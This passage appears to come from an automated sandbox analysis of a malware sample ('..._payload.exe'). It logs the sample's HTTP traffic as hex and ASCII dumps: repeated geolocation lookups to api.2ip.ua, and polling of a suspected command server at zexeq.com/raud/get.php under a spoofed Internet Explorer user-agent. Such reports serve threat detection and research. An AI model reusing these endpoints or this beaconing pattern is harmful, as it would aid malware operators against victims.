                                                                                                Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:06.504729033 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzY2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                Jan 26, 2024 01:36:06.504745960 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:11.620079041 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:11.736500025 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:11 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:11.736566067 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5MzcxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                Jan 26, 2024 01:36:11.736607075 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0
                                                                                                Jan 26, 2024 01:36:17.138983011 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950
                                                                                                Jan 26, 2024 01:36:17.255230904 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=1fb87a8b-c2ee-e851-98b3-7a8a3aa4d950; expires=Fri, 26 Jan 2024 00:51:17 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:17.255290031 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 57 5a 69 4f 44 64 68 4f 47 49 74 59 7a 4a 6c 5a 53 31 6c 4f 44 55 78 4c 54 6b 34 59 6a 4d 74 4e 32
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMWZiODdhOGItYzJlZS1lODUxLTk4YjMtN2E4YTNhYTRkOTUwIiwicGFnZV90aW1lIjoxNzA2MjI5Mzc3LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                Jan 26, 2024 01:36:17.255330086 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449729104.21.65.244437020C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-01-26 00:35:57 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-01-26 00:35:58 UTC895INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Jan 2024 00:35:58 GMT
                                                                                                Content-Type: application/json
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q3OOOhb8HiVTivBNRbGiJjUkqgGV7lddOzhoZcng%2FufICfO7r2WEkysko46j58hp7gYd9BsNwcLHTQdmcvBgu%2Bzdep%2FD%2FGJXp73%2BqXyBC7fA0W9au0Xz7pLfpy%2Fb"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 84b4adcebccead80-ATL
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-01-26 00:35:58 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                2024-01-26 00:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449730104.21.65.244436376C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-01-26 00:35:59 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-01-26 00:35:59 UTC889INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Jan 2024 00:35:59 GMT
                                                                                                Content-Type: application/json
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JpXoGHjqVnHe5oqaAVBYqd9LbtMD15k%2FJmz6GEEcGMKYtWYSDM1t744Q%2FaHNEgYOBrJo3HdCEj4zire3p21kr6xheEbqXF%2FEXlp3VbFol8Ojui6ITcBONKNtnZPv"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 84b4add84dfa0719-ATL
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-01-26 00:35:59 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                2024-01-26 00:35:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449733104.21.65.244437148C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-01-26 00:36:00 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-01-26 00:36:01 UTC887INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Jan 2024 00:36:00 GMT
                                                                                                Content-Type: application/json
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vUyG6sXhlL8Wz7XMVGvv8yZIifLHb79TGnU8GbvGjSSFxAUWPSDeH1%2B4dMf80S8HVkajEFMJX1HQ4p2tWMo9rUHVc8qzicqqHj2VBCg6HJCgmzqseX4gh3VWD%2B9m"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 84b4ade00ddf53aa-ATL
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-01-26 00:36:01 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                2024-01-26 00:36:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449735104.21.65.244436252C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-01-26 00:36:07 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-01-26 00:36:08 UTC893INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Jan 2024 00:36:08 GMT
                                                                                                Content-Type: application/json
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Aoq1XNyDiaEYN4edJXffieQby1LGlxhP9utRy%2Fl4BIz1ImJqRgjqimPmr5AKKyq3oizcTLHUf3te%2BbvxA%2FyPKdykWpNa21yCxRDw%2BYmBPPXp6FuuwOFEdlr%2B7eX9"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 84b4ae0ce844b033-ATL
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-01-26 00:36:08 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                2024-01-26 00:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449736104.21.65.244436684C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-01-26 00:36:15 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: api.2ip.ua
                                                                                                2024-01-26 00:36:16 UTC891INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Jan 2024 00:36:16 GMT
                                                                                                Content-Type: application/json
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                strict-transport-security: max-age=63072000; preload
                                                                                                x-frame-options: SAMEORIGIN
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block; report=...
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ybia5u8J%2BCRNvslAuN078TLOkYVXoBDaTCNj%2BcApFUNo4wMHBAbxNjopJ9lyOm30XBo4lNC%2FBJPurxWzlpqdF1FPp9XEW3tJp3llArBKCBqoBEGLECWfd750cBT%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
